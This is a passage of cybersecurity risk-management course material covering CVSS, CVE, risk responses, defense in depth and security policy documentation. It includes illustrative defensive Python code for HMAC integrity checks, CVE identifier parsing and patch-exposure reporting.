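"""Keyed integrity check over stored records (HMAC-SHA256 assumed as the MAC).

Added illustration; not code from the CFR-410 courseware. The key and the
records below are constructed for the example.
"""
import hashlib
import hmac
from typing import List, Tuple

# Constructed demo key. A real deployment loads the key from a key store or
# HSM, never from source code, because anyone holding it can forge tags.
DEMO_KEY = b"constructed-demo-key-do-not-reuse"


def make_tag(key: bytes, message: bytes) -> str:
    """Compute the expected digest for a record at write time."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_tag(key: bytes, message: bytes, tag: str) -> bool:
    """Recompute the digest on output and compare it with the stored one.
    compare_digest runs in constant time so the comparison itself does not
    leak how many leading characters of the tag were correct."""
    expected = make_tag(key, message)
    return hmac.compare_digest(expected, tag)


def write_record(key: bytes, value: bytes) -> Tuple[bytes, str]:
    """Store a value together with its tag (the input routine)."""
    return value, make_tag(key, value)


def audit_store(key: bytes, records: List[Tuple[bytes, str]]) -> List[int]:
    """Auditing control: scan every stored (value, tag) pair and return the
    indices whose value no longer matches its tag, i.e. records that were
    modified by something that did not hold the key."""
    return [i for i, (value, tag) in enumerate(records)
            if not verify_tag(key, value, tag)]


def demo() -> List[int]:
    """Write three constructed records, simulate an unauthorized change to one,
    and return the indices the audit flags."""
    store = [
        write_record(DEMO_KEY, b"employee=1001;net_pay=2500.00"),
        write_record(DEMO_KEY, b"employee=1002;net_pay=3100.00"),
        write_record(DEMO_KEY, b"employee=1003;net_pay=2750.00"),
    ]
    # The stored tag was computed over the original bytes; changing the value
    # without the key leaves the tag stale, so the audit reports index 1.
    value, tag = store[1]
    store[1] = (value.replace(b"3100.00", b"9100.00"), tag)
    return audit_store(DEMO_KEY, store)


if __name__ == "__main__":
    print("records failing integrity check:", demo())
```

A plain (unkeyed) hash such as SHA-256 detects accidental corruption but not deliberate modification, because whoever can rewrite the value can also rewrite the stored hash; the key is what turns the digest comparison into an integrity control rather than a checksum.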

e
Risk Scoring Systems

Once information critical to the business has been classified by the risk associated with its CIA attributes, and stakeholder input and technical controls are considered in the context of the CIA triad, it is possible to develop risk scores for the data. This is done subjectively and is based on a sliding scale of harm to the business.

One example is to rate the highest risks a 10, the lowest risks a 1, and the lack of risk a 0. These values are typically assigned by the information owner or a cybersecurity practitioner charged with evaluating risk. This is a simple method of scoring that can be useful at the preliminary stages of risk management, but you should eventually rely on more sophisticated scoring systems that can more precisely quantify risk. There are several such scoring systems accepted by the cybersecurity community, and some of them have overlapping methodologies. There is not one authoritative source of record for all risks.

The value of any scoring system is to rank the severity of risks so that you can more confidently prioritize some risks over others. By prioritizing risks and your responses to them, you will be more effective at reducing their likelihood and impact than if you chose to address the risks in an arbitrary order or by the order in which they are identified.

Articulate Risks Using Business Language

To ensure the business stakeholders understand the risks, in addition to calculating risk scores, you should articulate the risk in business language such that the cause and effect can clearly be understood by the business owner of the asset. For example, a risk of a denial of service (DoS) attack should be put into plain language that describes how the risk would occur and, as a result, what access is being denied to whom and the effect on the business. For instance: "As a result of malicious or hacking activity against the public website, the site may become overloaded, preventing clients from accessing their client order accounts. This will result in a loss of sales for n hours and a potential loss of revenue of n dollars."

Common Vulnerability Scoring System (CVSS)

Risk scores depend on the integrated concept of risk. Vulnerabilities are a big part of that concept. Most vulnerabilities today are rated using the Common Vulnerability Scoring System (CVSS). The CVSS is a risk management approach where vulnerability data is quantified and then the degrees of risk to different types of systems or information are taken into account. Since it is an open source formula for risk quantification, the CVSS is easily modified to fit a specific organization's needs. The CVSS is similar to the examples used previously, but it is much more granular.

The system consists of three core metric groups (and their associated sub-metrics): base metrics that characterize fundamental components of a vulnerability, temporal metrics that qualify components of a vulnerability that change over time, and environmental metrics that qualify components of a vulnerability that depend on specific contexts and implementations. The following table lists these metrics and sub-metrics for version 3.1 of the CVSS.

Base Metrics
• Attack vector
• Attack complexity
• Privileges required
• User interaction
• Confidentiality impact
• Integrity impact
• Availability impact
• Scope

Temporal Metrics
• Exploit code maturity
• Remediation level
• Report confidence

Environmental Metrics
• Modified base metrics
• Confidentiality requirements
• Integrity requirements
• Availability requirements

The strength of the CVSS is that it produces consistent results for the vulnerability's threat in the base and temporal metric groups, while enabling organizations to match those results with their specific computing environment. You can do this by using the CVSS calculator (available at https://nvd.nist.gov/cvss.cfm?calculator&version=3.1) and plugging in your own metric values.

Note: Time permitting, consider demonstrating the CVSS calculator.

Common Vulnerabilities and Exposures (CVE)

The CVSS is used to score vulnerabilities in the Common Vulnerabilities and Exposures (CVE) system, a public dictionary of vulnerabilities that facilitates the sharing of data among organizations, security tools, and services. In a sense, the CVE normalizes data about a vulnerability so that fixing or mitigating the issue is less of a challenge. The CVE is maintained by the non-profit MITRE Corporation and receives funding from the U.S. Department of Homeland Security.

There are several elements that make up a vulnerability's entry in the CVE:

• Each vulnerability has an identifier in the format CVE-YYYY-####, where YYYY is the year the vulnerability was discovered, and #### is at least four digits that indicate the order in which the vulnerability was discovered.
• A brief description of the vulnerability.
• A reference list of URLs that provide more information on the vulnerability.
• The date the vulnerability entry was created.
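To show the identifier format and the four entry elements in use, here is an added Python example written for this edition of the text, not code from CertNexus or from MITRE: it validates and parses identifiers of the CVE-YYYY-#### form described above, sorts them by year and sequence number rather than as plain strings, and builds an entry record from a constructed dictionary. The sample record borrows the CVE-2021-34527 identifier shown in Figure 1-6, but its description wording and creation date are placeholders for this example, not the real entry's values; the reference URLs are the public CVE and NVD sites.

```python
import re
from dataclasses import dataclass
from datetime import date
from urllib.parse import urlsplit

# CVE-YYYY-NNNN: a four-digit year, then at least four sequence digits (more are allowed).
CVE_ID_RE = re.compile(r"^CVE-(\d{4})-(\d{4,})$")
FIRST_CVE_YEAR = 1999  # the CVE list started in 1999; an earlier year is a sign of a typo


@dataclass(frozen=True)
class CveEntry:
    """The four elements of a CVE entry listed above."""
    cve_id: str
    description: str
    references: tuple
    created: date


def parse_cve_id(cve_id):
    """Return (year, sequence) for a well-formed identifier; raise ValueError otherwise.

    Lower-case input and surrounding whitespace are tolerated, which is how
    identifiers usually arrive in tickets, but any other shape is rejected.
    """
    match = CVE_ID_RE.match(cve_id.strip().upper())
    if not match:
        raise ValueError(f"malformed CVE identifier: {cve_id!r}")
    year, sequence = int(match.group(1)), int(match.group(2))
    if not FIRST_CVE_YEAR <= year <= date.today().year:
        raise ValueError(f"implausible CVE year in {cve_id!r}")
    return year, sequence


def sort_key(cve_id):
    """Order identifiers numerically, so CVE-2021-9999 comes before CVE-2021-34527."""
    return parse_cve_id(cve_id)


def load_entry(record):
    """Build a CveEntry from a plain dict, rejecting bad identifiers and non-HTTP references."""
    parse_cve_id(record["id"])  # raises on a malformed identifier
    references = []
    for url in record["references"]:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.netloc:
            raise ValueError(f"reference is not an http(s) URL: {url!r}")
        references.append(url)
    if not references:
        raise ValueError("a CVE entry needs at least one reference URL")
    return CveEntry(
        cve_id=record["id"].strip().upper(),   # canonical form keeps the original digits
        description=record["description"].strip(),
        references=tuple(references),
        created=date.fromisoformat(record["created"]),
    )


# Constructed sample record. The identifier is the one shown in Figure 1-6; the description
# wording and the creation date are placeholders for this example, not the real entry's values.
SAMPLE_RECORD = {
    "id": "cve-2021-34527",
    "description": "Windows Print Spooler remote code execution vulnerability (placeholder summary).",
    "references": ["https://cve.mitre.org/", "https://nvd.nist.gov/"],
    "created": "2021-01-01",
}

if __name__ == "__main__":
    entry = load_entry(SAMPLE_RECORD)
    print(entry.cve_id, parse_cve_id(entry.cve_id), entry.created, len(entry.references))
```

The numeric sort matters once a year has more than 9,999 entries: identifiers then have five or more digits, and a plain string comparison puts CVE-2021-34527 before CVE-2021-9999.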

Figure 1-6: CVE-2021-34527, which details a vulnerability in the Windows Print Spooler service that enables an attacker to execute arbitrary code on a target host. This vulnerability and its privilege escalation variant CVE-2021-1675 were together dubbed PrintNightmare.

Note: Although the CVE is very useful for identifying weaknesses in your systems, in some circumstances, you may be unable to replicate the vulnerability.

CWE and CAPEC

In addition to the CVE, the MITRE Corporation also maintains the Common Weakness Enumeration (CWE™) and Common Attack Pattern Enumeration and Classification (CAPEC™) databases. The CWE focuses on enumerating software vulnerabilities, while CAPEC classifies specific attack patterns. These databases also tag each entry with a specific ID for easy reference.
• CVE site: https://cve.mitre.org/
• CWE site: https://cwe.mitre.org/
• CAPEC site: https://capec.mitre.org/

National Vulnerability Database (NVD)

The National Vulnerability Database (NVD) is a more robust superset of the CVE maintained by NIST. The NVD uses the CVSS to assess vulnerabilities. It is available at: https://nvd.nist.gov/.

Risk Response Techniques

How an organization reduces or removes risk is based on the thresholds established for different risks, and it is entirely dependent on the risk appetite of the organization. The following table describes the four possible approaches to risk response.

Note: Consider providing or asking students for non-IT-related examples. This may help some students better understand each response technique.

Risk Response Technique: Description

Avoid: Risk avoidance means that risk has been completely eliminated (reduced to zero). This is generally achieved by terminating the process, activity, or application that is causing the risk. For example, if you do not need a chat program to facilitate collaboration among employees, you might simply block access to it from within your systems, thus eliminating the risk it brings. Total risk avoidance is virtually impossible in any organization, as it would necessitate that you remove many vital systems your business requires to function.

Transfer: Risk transference moves the responsibility for managing risk to another organization, such as an insurance company or an outsourcing provider. This external organization takes over and maintains the risks associated with data and other resources. Examples include purchasing natural disaster insurance to cover servers and the data present on them, and relying on cloud providers to store and secure data. You should choose the transference approach if the risks become larger and more complicated than your organization can manage without impeding your operations.

Mitigate: Risk mitigation is the process of implementing controls and countermeasures to reduce the likelihood and impact of risk to an organization. Organizations will mitigate risk so that the potential harmful outcomes do not exceed the organization's risk appetite. For example, if you have a high-traffic network, you may reduce the risk the traffic poses to the network by implementing an intrusion prevention system (IPS). You might still have to deal with some residual risks after mitigation.

Accept: Risk acceptance is a response in which an organization identifies and analyzes a risk, and then determines that the risk is within the organization's appetite and no additional action is needed. The risk management plan that an organization develops and implements will outline its risk appetite, so any risks that are accepted are within the parameters of what the organization deems unworthy of further response. As previously stated, not all risks can be avoided; likewise, not all risks can be transferred or mitigated. In your organization, you must decide what level of risk is unlikely or does not have enough potential for harm to warrant extra effort and cost.

Note: Ignoring risk is not the same as accepting it. When you accept a risk, you have evaluated it and decided not to transfer, reduce, or avoid it. When you ignore risks, you do not take the time to identify and evaluate them. Ignoring risks is a dangerous approach to take, and can lead to unforeseen disasters.

Note: Some responses will incorporate more than one technique. For example, you can begin to mitigate risk until it reaches an acceptable level, at which point you accept that risk.

Inherent Risk and Residual Risk

Inherent risk is the risk an event will pose if no controls are put in place to mitigate it. Identifying the inherent risk of an asset or activity will aid you in assessing which controls to put in place to mitigate the risk.

Residual risk is the risk that remains even after controls are put in place. Identifying the residual risk of an asset or activity will aid you in assessing the effectiveness of the controls you put in place to mitigate the risk.

Communicating Recommendations for Mitigating Risk

Unless you're fully in charge of making risk management decisions, you'll likely need to get approval before you (or anyone else on your team) start responding to risk. Whether it's your immediate manager or someone higher up, you need to communicate recommendations to an audience that can sign off on them. Remember, it's important to put risk in the context that business leaders can understand—i.e., how it affects business operations, revenue, productivity, etc. The same goes for mitigation tactics. How will the tactics you recommend save the organization time and money? How will not implementing the mitigation tactic, or implementing some cheaper tactic, cause problems? The decision makers need to be convinced of a tactic's cost effectiveness, not just its technical effectiveness.

However, there are situations where going through the normal channels and/or process to obtain approval is just not feasible. Consider that there's an imminent attack on your systems and network and every second counts. You don't have time to wait for the top-level management to meet and discuss the issue at hand. This is where incorporating levels of authority into a risk management plan is crucial.

Levels of Authority

Levels of authority determine what responsibility someone has to act. One common hierarchy has four levels:
1. Act from instruction. The individual acts only when instructed to by other decision makers.
2. Act after approval. The individual is able to evaluate the situation themselves, but must still wait for approval before acting.
3. Decide, inform, and act. The individual is able to act without obtaining approval, but they must still notify a decision maker promptly.
4. Decide and act. The individual has the power to act with complete independence.

As an individual's knowledge, skills, and experience grow, so too does their level of authority. However, the needs of the organization in an emergency are also important factors that can temporarily change one's level of authority. If a skilled incident responder detects a potentially devastating attack in progress, they may have the authority to "decide, inform, and act" as stipulated in the existing incident response plan. In a normal scenario or in response to a minor incident, they may only be allowed to "act after approval."

Continuous Monitoring and Improvement

Continuous monitoring and improvement is the process of detecting changes in an environment and then quickly and efficiently addressing them. Since risk is always changing within an organization, the organization must continually evaluate its networks to ensure that implemented controls are operating as intended. A good example of this is the use of patch and vulnerability management software. Since new vulnerabilities are found regularly, and new patches are released for those vulnerabilities, organizations should expect to have a recurring process to update equipment. However, it is very time consuming to quantify the recurring change in an organization with a regular risk assessment approach.

When risk is mitigated under a program of continuous monitoring and improvement, the business will be able to bolster its operational processes and cut down on costly risk assessments. There are software tools that provide this functionality by alerting security staff of unanticipated resource access, invalid or expired software licenses, and mobile devices that attach to the network from anywhere and at any time.
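One of the recurring checks that patch and vulnerability management software automates is comparing what is installed against what an advisory says is fixed. The Python below is an added example written for this edition of the text, not code from the course or from any vendor's product: it walks a constructed host inventory, matches each package against constructed advisories, and reports exposed hosts ordered by the advisory's CVSS score so that the highest risk is patched first. The host names, advisory identifiers, versions and scores are all placeholders. One detail the code handles that a naive check would not is version ordering: compared as plain strings, "1.9.0" sorts after "1.10.0", so a string comparison would report a host on 1.9.0 as already patched.

```python
import re

# Constructed inventory: host -> {package: installed version}. Placeholder hosts, not real systems.
INVENTORY = {
    "web-01": {"openssl": "1.1.1k", "nginx": "1.9.0"},
    "web-02": {"openssl": "1.1.1w", "nginx": "1.18.0"},
    "db-01": {"openssl": "3.0.2", "postgresql": "14.2"},
}

# Constructed advisories. "branch" is the release line the advisory applies to and
# "fixed_in" the first version in that line carrying the patch. IDs and scores are placeholders.
ADVISORIES = [
    {"id": "ADV-EXAMPLE-0001", "package": "openssl", "branch": "1.1.1", "fixed_in": "1.1.1l", "cvss": 7.5},
    {"id": "ADV-EXAMPLE-0002", "package": "nginx", "branch": "1", "fixed_in": "1.10.0", "cvss": 9.8},
    {"id": "ADV-EXAMPLE-0003", "package": "postgresql", "branch": "14", "fixed_in": "14.3", "cvss": 5.3},
]


def version_key(version):
    """Turn '1.1.1k' into a tuple that orders numerically, with letter suffixes after numbers."""
    parts = re.findall(r"\d+|[A-Za-z]+", version)
    return tuple((0, int(p)) if p.isdigit() else (1, p.lower()) for p in parts)


def in_branch(installed, branch):
    """True when the installed version belongs to the advisory's release line."""
    prefix = version_key(branch)
    return version_key(installed)[: len(prefix)] == prefix


def is_affected(installed, advisory):
    """Affected when the host runs the advisory's release line at a version below the fix."""
    return in_branch(installed, advisory["branch"]) and (
        version_key(installed) < version_key(advisory["fixed_in"])
    )


def find_exposures(inventory, advisories):
    """List every (host, package) still below an advisory's fixed version, highest CVSS first."""
    exposures = []
    for host, packages in inventory.items():
        for advisory in advisories:
            installed = packages.get(advisory["package"])
            if installed is not None and is_affected(installed, advisory):
                exposures.append({
                    "host": host,
                    "package": advisory["package"],
                    "installed": installed,
                    "fixed_in": advisory["fixed_in"],
                    "advisory": advisory["id"],
                    "cvss": advisory["cvss"],
                })
    return sorted(exposures, key=lambda e: e["cvss"], reverse=True)


if __name__ == "__main__":
    for e in find_exposures(INVENTORY, ADVISORIES):
        print(f"{e['cvss']:>4}  {e['host']:<7} {e['package']} {e['installed']} "
              f"-> {e['fixed_in']} ({e['advisory']})")
```

Run on the sample data, the report lists web-01's nginx first (score 9.8), then web-01's OpenSSL, then db-01's PostgreSQL, while web-02 and db-01's OpenSSL 3.0.2 are correctly left out because they are either already at or above the fix or outside the affected release line.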

Verification and Quality Control

Verification and quality control are the processes by which an organization tests a product to identify whether or not it complies with a set of requirements and expectations. These requirements and expectations can be driven by customers and other stakeholders, or they can be driven by internal and external compliance factors, such as industry regulations and company-defined quality standards. Ultimately, an organization may choose to put its products and services through the verification and quality control processes to help mitigate financial, brand-based, and other risks that come with pushing a poor-quality, unverified product to market.

The following table lists some of the common strategies for verification and quality control.

Verification/Quality Control Strategy: Description

Evaluation/assessment: Evaluation and assessment strategies typically involve identifying the state of an organization's products and services. This helps the evaluator spot problem areas and suggest potential corrective actions.

Auditing: Auditing is similar to evaluation and assessment strategies, but it takes a more rigid approach to reviewing the organization. The auditor has a predefined baseline they compare the organization's current state to, which helps the auditor identify any specific violations that require remediation.

Maturity model implementation: Maturity models review an organization against expected goals and determine the level of risk the organization is exposed to based on the degree to which it is currently meeting those goals. This enables the reviewer to gain a more accurate perspective of how an organization's products or services may be putting the organization at risk, and guides risk management strategies as a response.

Certification: When a product or service is certified, it is considered to have met all of the requirements it is subject to after extensive testing. A certification is often conducted by a third party that specializes in verification and quality control, which may be a requirement in certain industries. The purpose of certification is to provide all relevant stakeholders with an assurance of a product or service's quality, mitigating risk for the manufacturer, vendor, and end user.

Defense in Depth

In a defense in depth strategy, the organization assumes that no amount of comprehensive security controls will truly be achievable, and that risk cannot be totally avoided. Therefore, a defense in depth approach positions the several layers of security as if they were roadblocks. Each layer is intended to reduce risk rather than eliminate it outright. This way, the risk loses its impact, or the risk itself becomes much easier to manage and mitigate. Additionally, instead of just focusing on the tools used to protect the network and its systems directly, defense in depth is used to plan personnel training, policy adoption, physical protection, and other, broader security strategies.

The following table lists some of the high-level components that make up a defense in depth strategy.

Component: Description

Personnel: Your personnel are simultaneously the most powerful force for security in your organization and its biggest vulnerability. A defense in depth strategy sees that personnel undergo security training that is relevant to them. In addition, you need to enforce certain best practices, like cross-training personnel for similar functions in case one team member can no longer fulfill their duties; mandating that a certain process is under dual control so no one person can make a snap decision; describing how personnel can or cannot share information with third-party consultants; implementing a succession plan for personnel that move to other roles or leave the company; and more.

Processes: As you've seen, processes must undergo continual improvement to truly be effective. A defense in depth program will schedule routine tests and reviews to see if these processes comply with verification standards. Likewise, you'll need a plan for retiring processes that no longer meet standards and cannot be improved upon.

Technologies: There's certainly no shortage of technological solutions that can fit into a defense in depth program. Some of the most significant include security-focused appliances like intrusion detection and event management systems; security suites like penetration testing platforms; cryptographic solutions that ensure the confidentiality of data both stored and transmitted; and many more. Most effective solutions are capable of automatic reporting so that security personnel are alerted to problems as quickly as possible. In cases where acquiring and maintaining security solutions are beyond the organization's capabilities, they can still outsource this component of defense in depth to a cloud-based Security as a Service (SECaaS) provider.

Architecture design: The design of the organization's network architecture plays a vital role in any defense in depth strategy. How a network is designed in terms of its topology, both physical and logical, can have a strong effect on risks that face the organization. One major architectural design strategy involves segmenting the network into multiple sub-networks so that a compromise of one segment does not necessarily mean it will spread to the rest of the network.

Note: Defense in depth comes from the military strategy of arranging defensive lines or fortifications so they can defend each other, particularly if there is an enemy incursion through one of the lines of defense.

Figure 1-7: An example of a defense in depth strategy.

Guidelines for Mitigating Risk

Follow these guidelines when planning how you will mitigate risk in the organization.

Mitigate Risk in the Organization

When mitigating risk:
• Categorize information into classes like public, private, restricted, and confidential.
• Classify information in terms of how it will impact your organization's CIA.
• Incorporate stakeholder input for CIA-based decisions.
• Understand technical controls in terms of how they do or do not fulfill CIA.
• Avoid, transfer, mitigate, or accept risk based on factors like cost, viability, resources, and necessity.
• Implement continuous monitoring to quickly detect changes to an environment.
• Communicate to relevant stakeholders regarding how you measure, respond to, and mitigate risks.
• Put products and services through verification and quality control processes.
• Adopt a defense in depth strategy for layered risk mitigation.

ACTIVITY 1-3
Mitigating Risk

Scenario

Your team at Develetech has been busy assessing the various risks that could affect the company. Now it's time for you to analyze these results and respond appropriately. Choosing the right risk mitigation strategies is essential in meeting stakeholder expectations and keeping your systems secure at the same time.

Activity: Mitigating Risk

1. Develetech is interested in implementing routine backups of all customer databases. This will help uphold availability because you will be able to quickly and easily restore the backed up copy, and it will also help uphold integrity in case someone tampers with the database.

What controls can you implement to round out your risk mitigation strategy and uphold the components of the CIA triad?

A: Answers will vary, but a strong way to secure confidentiality is through encryption. Encrypting the database will deter unauthorized users from making sense of the stored data. You could also implement access control to prevent an intrusion before it even begins. This will keep your databases out of the hands of an attacker. In addition, you can implement physical security measures in case an attacker has in-person access to these databases.

2. During their risk assessment, your team has identified a security flaw in an application your organization developed.

To conduct a proper analysis of how this could bring risk to your organization, what are some of the questions you need to ask?

A: Answers will vary, but you should ask how easily exploitable the flaw is, and what the scope of an exploit could be. Can an exploit expose confidential information? Can it crash the app or otherwise render other systems unavailable? What attack vectors exist that could allow an attacker to carry out this exploit? What mitigation plans, if any, are in place to address this flaw? How easily and quickly can you patch the flaw, and how will you deploy it so that all of the app's users are covered?

3. You've analyzed the application flaw and discovered that it could allow an unauthorized user to access the customer database that the app integrates with, if the app uses poor input validation. The attacker could glean confidential customer information, which would have a high impact on your business. However, you determine that your app's current input validation techniques account for all known exploits of this kind.

How will you respond to this risk?

A: The answer is debatable and may require more careful analysis. However, some may argue that the strong input validation controls already in place imply that you should just accept the risk and save yourself the time, effort, and cost of an active response. Others will say that this is inadequate because it only accounts for known values, and that an attacker could find a way around the validation. This would necessitate a response like mitigation, in which more application security controls are implemented to harden the app against attack. Some might suggest transferring the risk to another organization that can provide more reliable security. Some might even argue that the risk to your customers' confidentiality is too great, and that you should avoid the risk entirely by dropping the internally developed app and using a different solution.

TOPIC D
Integrate Documentation into Risk Management

A less direct, but still important, part of risk management is developing documentation for future reference. Writing a policy and recording risk-related activity will move your risk management strategy from the conceptual to the concrete. This will provide the foundation on which to support your assessment and mitigation practices.

From Policies to Procedures

A policy identifies the organization's intentions. Policies are interpreted and made operational through standards, guidelines, and procedures. In regard to cybersecurity and compliance, these terms are used as follows:
• Policies are high-level statements that identify the organization's intentions.
• Standards consist of specific low-level mandatory controls that help enforce and support policies.
• Guidelines are recommended, non-mandatory controls that support standards or that provide a reference for decision making when no applicable standard exists.
• Procedures are step-by-step instructions on tasks required to implement various policies, standards, and guidelines.

Note: Consider generating discussion about students' experiences with each type of document. You may also want to discuss how some organizations consolidate these different types of documents into a single document.

Figure 1-8: Policies are the foundation upon which standards, guidelines, and procedures are built.

Processes

Processes are also components of documentation. They describe at a high level how actions can achieve desired goals. This makes them distinct from procedures as they are not focused on specific steps or instructions to be carried out, but rather an overall chain of activities. They do not fit within any specific spot of the hierarchy as shown in the figure, as they can be included at any point. In other words, policies can include language that defines processes. Standards, guidelines, and procedures can all reference processes in different ways. Cybersecurity, like most technical business functions, involves many processes.

Lesson 1: Assessing Cybersecurity Risk | Topic D

The Policy Lifecycle

The policy lifecycle starts once an organization determines it needs a formal information security policy. The driver for an information security policy varies by organization; it could be for compliance reasons, the increasing size of the organization necessitating a written security policy to replace informal guidelines, to meet contractual obligations, or in response to a breach. Regardless of the reasons for its development, ultimately, the policy must be approved by executive management, and in some cases the board of directors, should the organization be large enough.

Once the organization has identified a need, there are several ways to begin crafting a policy. One of the easiest methods is to download a free policy template available from various security organizations, and then customize the policy to fit your organization. It is also common for organizations to bring in a security consulting company to aid them in policy development.

Regardless of how you approach your company's policy, it is important to also compare and contrast the company's policy with those of other organizations. There may be topics or risks you did not previously consider that affect the elements of the policy.

Not all policies are created equal. It is best to use clear and concise language within the policy that is easy to understand. In other words, attempt to limit the legalese that pervades many policies. At the same time, it is important to understand the organization's information security policy is a legal document, which you may provide to employees, customers, and in some cases, a court of law.

In conjunction with any laws or regulatory requirements the organization may be under, you must include business leaders in the development of the policy. If a policy is too strict, it may impair workers' ability to conduct business, which in turn impairs the organization. A well-developed policy should address all the risks the business may face. It is a living document that should be updated regularly as the business, technology, environments, and risks in an organization change. When emerging risks are identified, your policies should clearly state when to report an incident and whom to report the incident to. Not all incidents require legal action, so it's necessary for the policy to cover when to report to law enforcement versus when to report to internal staff only.

Figure 1-9: An example security policy.

The Procedure Lifecycle


or
e
To support the policies your organization has developed, it's important to create procedure
at

The Procedure Lifecycle


documents that very clearly explain how the organization implements different security functions.
These are the "how-to" documents used by systems administrators and company employees that
lic

include the steps to implement and enforce the policies. They must be specific enough so that any
user who is expected to follow them can, regardless of their technical knowledge. If a predetermined
level of technical prowess is required, then that should be explicitly stated. For example, a data
up

handling procedure designed to be used by system administrators may make the assumption that the
administrators are familiar with the platform they are supporting; however, a similar procedure
designed for marketing and sales employees who have less technical familiarity may need more in-
depth and explicit steps.
D

The style and contents of these documents will also vary considerably between commercial
organizations and government bodies. It is common for documents relevant to military or similar
agencies, such as emergency services, to be more prescriptive than those for standard businesses. In
ot

other words, you must understand your target audience and tailor the procedures appropriately.
Procedure development is done in much the same way as policy development. Many standards
N

organizations such as NIST or CIS have predefined procedures or standards documents that you
can use as a starting point, and then you can tailor them to fit your organization. Certain
organizations will have specific types of standards they need to write to. Alternatively, you can bring
o

in consultants to help define procedures to make them compliant with particular policies. Regardless
of the approach, it is always a good idea to compare and contrast policies with other organizations
D

to see how they are implementing the "how-to" of information security. Many organizations, both
commercial and governmental, publish their key policies online to enable potential users of their
services to understand and gain confidence in how the organization manages information.
Just like the policies on which they are based, procedures are living documents. If a policy changes
in light of new business, technological, or environmental changes, then so too should procedures. A
policy that updates the organization's security posture in the face of new threats and risks is useless
unless it is translated into practice through procedural documentation.


Figure 1-10: An example of a procedure document.
Topics to Include in Security Policies and Procedures

All information security policies and procedures contain topics specific to an organization and its requirements; however, there is a recommended list of topics that your security policies and procedures documentation should include. As you draft the documentation, be sure to obtain the approval and buy-in from top management for the following:


• The scope of what the policy covers.
• How information is classified.
• Goals for secure handling of information.
• How other management policies relate to the security policy.
• References to supporting documents.
• Specific instructions for handling security issues.
• The person or group who has specific designated responsibilities.
• Known consequences for security policy non-compliance.
Best Practices to Incorporate in Security Policies and Procedures

Security documents that incorporate the previous topics will help to reduce your overall risk. Additionally, you should support the development of policies and procedures that contain the best practices listed in the following table. Note that the organization will not necessarily be able to, or should not, incorporate all of these practices in the risk management process.

Instructor note: Consider discussing with students the potential ramifications of incorporating these best practices in security policies and procedures, such as a loss of productivity due to practices like mandatory vacation and job rotation.


Best Practice Description

Separation of duties: States that no one person should have too much power or responsibility. Duties and responsibilities should be divided among individuals to prevent ethical conflicts or abuses of power. Duties such as authorization and approval, and design and development, should not be held by the same individual because it would be far too easy for that individual to defraud or otherwise harm an organization. For example, it would be easier for an employee to make sure the organization only uses specific software that contains vulnerabilities if they are the only one with that responsibility. In many typical IT departments, roles like backup operator, restore operator, and auditor are assigned to different people.

Job rotation: States that no one person stays in a vital job role for too long. Rotating individuals into and out of roles, such as the firewall administrator or access control specialist, helps an organization ensure it is not tied too firmly to any one individual because vital institutional knowledge is spread among trusted employees. Job rotation also helps reduce the risk of individuals abusing their power and privileges, and makes collusion between employees harder to sustain, because the people in a position to collude keep changing.

Mandatory vacation: A method of preventing fraud that provides you with an opportunity to review employees' activities. The typical mandatory vacation policy requires that employees take at least one vacation a year in a full-week increment so that they are away from work for at least five days in a row. During that time, your corporate audit and security teams have time to investigate and discover any discrepancies in employee activity. When employees understand the security focus of the mandatory vacation policy, the risk of fraudulent activities decreases. The control only works if someone else actually performs the absent employee's duties during that week and the employee does not keep working through remote access; otherwise nothing is exposed for review.

Least privilege: Dictates that users or systems should only have the minimal level of access necessary for them to perform the duties required. This level of minimal access includes facilities, computing hardware, software, and information. When a user or system is given access, that access should still be only at the level required to perform the necessary tasks. If you give a user or system access that exceeds what they require, then that is one more vector that can be used to compromise your organization.

Incident response: Defines monitoring, response, and reporting requirements for incidents that involve security breaches or suspected breaches. Generally, this set of policies requires a response to all incidents and suspected incidents within a defined time period and according to a reporting hierarchy that might depend on the severity of the incident. Security awareness and training both play a role in incident response so that personnel whose primary roles fall outside of information security know who and where to call for various levels of incidents, with a service desk or help desk being the first line in the reporting hierarchy. Without timely reporting to the right people, it will be much more difficult to mitigate the risk of a security breach causing harm to your organization.


Forensic tasks: Investigate from where a breach emanated, how a breach might have occurred, and who might be responsible for the breach. The forensics policy should include who is to be notified when forensics are required, under which conditions they are required, and how to contact individuals responsible for those duties. It is important to include legal counsel when formulating the forensics policy so that appropriate legal guidelines can be included, as necessary.

Employment and termination procedures: Defines on-boarding and off-boarding procedures for when employment begins and concludes, respectively. Proper on-boarding involves acclimating new employees to the security practices that you expect them to follow. This ensures there will be an expectation of liability in the arrangement. Likewise, when the employee leaves the organization, you should establish an off-boarding process. The departing employee must return company equipment and data, and the organization itself must revoke the employee's accounts, credentials, tokens, and physical access; relying on the employee's agreement to relinquish access is not a control on its own. In some cases, terminating an employee may put your company secrets at risk of being leaked; to prepare for this, your policy should specify when you should enforce non-disclosure agreements (NDAs).

Continuous monitoring: Outlines what mechanisms and tools are used to continuously monitor systems for changes that could increase risk to the organization. This practice also defines exactly what events and environments should be monitored based on a prior risk analysis. Some policies will include provisions for continuous improvement so that the organization can take a proactive role in addressing detected risks.

Training and awareness for users: Without comprehensive education, user-based attacks, such as social engineering, will be a major source of risk for an organization. In addition to teaching users about the inherent risks of using technology, it is important to also educate them on the policies and procedures required for them to operate safely within the organization's systems. Training should also take into account the types of access and roles that employees have. For example, you wouldn't train a salesperson on the risks of SQL injection attacks, but you would educate your website developers on this topic. Specific training mechanisms can range from subtle reminders through on-screen messaging at login, through paper-based pamphlets on employee desks or common areas, to training for specific elements of business operations (devices, software, building security, etc.).

Auditing requirements and frequency: Defines the types of audits performed, who performs those audits, and how frequently they are performed, and clearly delineates the authority for remediating audit issues found in the process. Auditing policies typically include provisions for event triggers that are based on organizational risk assessments. The audit policy should also define the auditing requirements for business partners and subcontractors, which should be included in all contracts with third parties who could have an impact on the overall security of the organization.

Information classification: Information should be classified according to its sensitivity and criticality to business operations. This enables you to prioritize your data protection methods and apply those protections with regard to the CIA of that data. Industry-recognized categories like public, private, restricted, and confidential will fulfill most organizations' needs, but you may wish to create your own categorization scheme if these are not adequate.

Types of Policies

ut
The following table includes examples of common security policies found in many organizations. Types of Policies

ib
Policy Description

